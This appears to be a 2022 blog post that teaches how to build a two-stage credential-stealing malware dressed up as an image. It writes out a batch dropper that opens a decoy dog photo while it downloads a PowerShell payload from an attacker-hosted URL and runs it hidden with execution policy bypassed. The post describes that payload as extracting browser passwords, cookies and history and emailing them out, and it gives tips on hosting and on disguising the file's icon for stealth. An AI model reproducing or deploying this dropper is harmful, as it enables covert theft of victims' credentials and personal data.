Hack anyone with just an “Image”

0xdom
Nerd For Tech
Published in
4 min readAug 11, 2022

--

So a few days ago my friend showed me the script he made which he was calling ransomware malware but was a batch script that will just rename the extensions of files to any random extensions and will just make that file unknown to the system. and when we click on the decrypter batch file it’ll then revert the files to their original extensions. Overall this project was pretty awesome because it introduced me to the amazing world of batch scripting but for sure I wouldn’t call this script ransomware malware lol.

As my interest grew in the world of batch scripting I started reading a lot of blogs on batch scripting and way’s to hack using it, soon I stumbled upon this awesome power-shell scripting guide by samratashok called nishang.

I’ve tried building this script, software that when executed steals all browser's cookies, passwords, history, and other useful data from the victim and sends that data to your configured email address I'll explain how the code works and everything as we advance through this tutorial.

Batch script

here’s the script for the batch file, this is the script that we’ll want to execute on the victim PC.

pushd %temp%powershell Invoke-WebRequest "https://static.onecms.io/wp-content/uploads/sites/24/2021/04/26/GettyImages-185743593-2000.jpg" -Outfile "doggy.jpg"doggy.jpg powershell Invoke-WebRequest -Uri site hosting your powershell script -OutFile .\power.ps1; start PowerShell -windowstyle hidden -NoProfile -ExecutionPolicy Bypass -file "power.ps1"

code explanation:

with pushd we change our working directory to the temp directory so it’ll leave fewer traces when executed in the target system.

In the 2nd line, we’re downloading a dog picture from the internet and saving it in an output file called doggy.jpg

then we’re executing the downloaded image tricking the victim into thinking that it’s just a normal image

but, in the 4th line, we’re downloading our original payload PowerShell script and saving it in power.ps1 we’ll look into what this Powershell script will do later.

last but not least we execute this power.ps1 script with some switches.

-Windowstyle hidden will run the PowerShell script in the hidden window

-NoProfile will execute the script without any profile it’ll ignore and execute the script even if it requires admin rights

-ExecutionPolicy Bypassas the name suggests it bypasses any execution restrictions if set any

-file to specify script files location

Powershell script

The script is hosted on Github here. What this Powershell script will do is it’ll download the hackbrowser software from my venom project, hackbrowser is an opensource project by some security researchers which is designed to extract the saved passwords and data from almost all of the browsers it’s a small software that does the job perfectly, I’ve tried using nirsoft tools but their latest update doesn't store the passwords in the text file that’s why I decided to switch to hackbrowser.

The second part of the script is emailing you’ll need to add the email Id and password in the PowerShell script possibly an outlook account.

If the script matches all the dependencies it’ll extract all the passwords and data from almost all the browsers and convert it into a zip file and will proceed to send it to the specified email address in the script.

Hosting PowerShell script

This is a two-stage malware first stage is when the batch file gets executed on the victim pc and the second stage will be when it requires PowerShell script to carry on the next operation for our attack to be successful.

That is why we need to host our PowerShell script somewhere, now the thing is you can host PowerShell script on your personal computer but imagine a scenario where the victim clicks on the payload in the nighttime or after two or three days, we can’t risk our script to not to be available in the middle of the night now do we? so I’d suggest you host your script somewhere safe but it should be available 24/7 now Github hosting is an option but I wouldn’t advise it, so I’ll leave this part up to you to decide.

when everything’s up and running insert the PowerShell script in the batch file and convert the batch file to an executable file. After modifying some options and changing the icon to that of the image’s icon you’ll be good to go if you have any suggestions on making it more stealth you could try it out and let me know.

project: https://github.com/Real0xdom/HWI

disclaimer: only use this information for educational purposes only I do not encourage you to do anything silly!

Thanks for reading, Have a great rest of your day.

--

--

0xdom
Nerd For Tech

I'm a cybersecurity aspirant currently working on my skills, wannabe hacker.